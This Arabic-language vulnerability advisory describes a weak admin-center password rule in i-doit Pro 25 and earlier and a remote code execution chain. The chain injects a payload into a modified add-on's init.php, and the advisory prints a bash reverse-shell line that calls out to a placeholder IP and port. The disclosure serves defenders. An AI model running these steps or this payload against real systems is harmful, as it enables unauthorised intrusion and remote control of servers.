
الإصدارات i-doit Pro 25 وما دونها معرضة لثغرة متطلب كلمة مرور ضعيف في admin-center، كما أن رفع إضافة خبيثة يؤدي إلى ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE). يمكن أن تسمح هذه الثغرات للمهاجم بتخمين كلمة المرور أو استخدام القوة الغاشمة بسهولة للوصول إلى admin-center ورفع إضافة خبيثة لتحقيق تنفيذ تعليمات برمجية عن بُعد.
وصف المنتج: i-doit هو توثيق لتقنية المعلومات (IT) مفتوح المصدر وقائم على الويب، ونظام إدارة بيانات التكوين (CMDB - Configuration Management Database) تم تطويره بواسطة synetics GmbH. i-doit Pro هو الإصدار التجاري من البرنامج ويتطلب ترخيصًا مدفوعًا. يأتي بميزات إضافية ودعم احترافي وتحديثات وتحسينات منتظمة. يحتاج المستخدمون إلى شراء ترخيص لاستخدام i-doit Pro، وتختلف التكلفة بناءً على عدد المستخدمين والميزات المطلوبة.
وصف الثغرة: وجدنا أن تطبيق الويب هذا لديه متطلب كلمة مرور ضعيف في إنشاء حساب admin-center، حيث يمكن لمالك التطبيق تعيين كلمة مرور بحد أدنى حرف واحد مع اسم المستخدم الافتراضي “admin”. وهذا قد يسهل على المهاجم استخدام القوة الغاشمة أو تخمين كلمة المرور للوصول إلى admin-center ورفع إضافة خبيثة لتحقيق تنفيذ تعليمات برمجية عن بُعد.
صفحة الويب المتأثرة: صفحة تسجيل دخول admin-center + تثبيت الإضافات
المعامل والمكوّن المتأثران: صفحة تسجيل دخول admin-center + تثبيت الإضافات
الخطوة 1: نظرًا لعدم وجود متطلب لكلمة المرور أو عدم وجود تعقيد لكلمة المرور في إنشاء الحساب لـ admin-center، يمكننا البدء بالقوة الغاشمة. توضح لقطة الشاشة أدناه أنه يمكننا تسجيل الدخول باسم المستخدم “admin” مع كلمة المرور “1”


الخطوة 2: انتقل إلى تبويب Add-on واختر رفع (upload)

الخطوة 3: هناك بعض المتطلبات مثل وجود package.json، ووجدنا أن الهدف قام بتنفيذ async للتحقق من كل الفئات والوظائف. ولكن يمكننا تنزيل إضافة مناسبة من بوابة العملاء الخاصة بهم وتعديل / إضافة في init.php، وهذه هي الطريقة الأكثر أمانًا لمنع انهيار النظام عند تشغيل الحمولة (payload). ملاحظة: يرجى وضع & في نهاية السطر لمنع انهيار النظام بعد تشغيل الحمولة، و init.php هو أفضل مكان لحقن الحمولة مثال: exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");



ملاحظة: تذكر إعادة ضغطه ورفعه


ملاحظة: انقر فوق Install ثم فعّل الإضافة المختارة

ملاحظة: سيتم تشغيل الحمولة الخاصة بك عندما يقوم شخص ما بتسجيل الدخول، ويمكن أن يكون أي شخص.
